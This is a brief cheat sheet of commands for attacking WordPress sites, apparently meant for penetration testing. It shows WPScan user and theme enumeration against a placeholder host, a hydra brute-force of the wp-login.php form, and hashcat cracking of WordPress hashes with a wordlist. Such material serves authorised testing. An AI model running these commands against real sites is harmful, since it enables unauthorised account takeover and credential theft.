Quick technics and tools for basic attacking WP websites:
WPScan
$ wpscan -u http://pentest.local/weblog/ --enumerate t --enumerate u $ wpscan -random-agent -u http://pentest.local --proxy 127.0.0.1:8080 Note : Don't trust WPScan result, always check against Searchsploit for all plugins vulnerability!!
Brute-forcing WordPress login credentials
$ hydra -l admin -P password.txt x.x.x.x http-post-form "/wp-login.php:log=admin&pwd=^PASS^:ERROR -V"
Cracking WordPress password hash
hashcat --force -m 400 -a 0 -o wp-cracked.txt wp-hash.txt /usr/share/wordlists/rockyou.txt
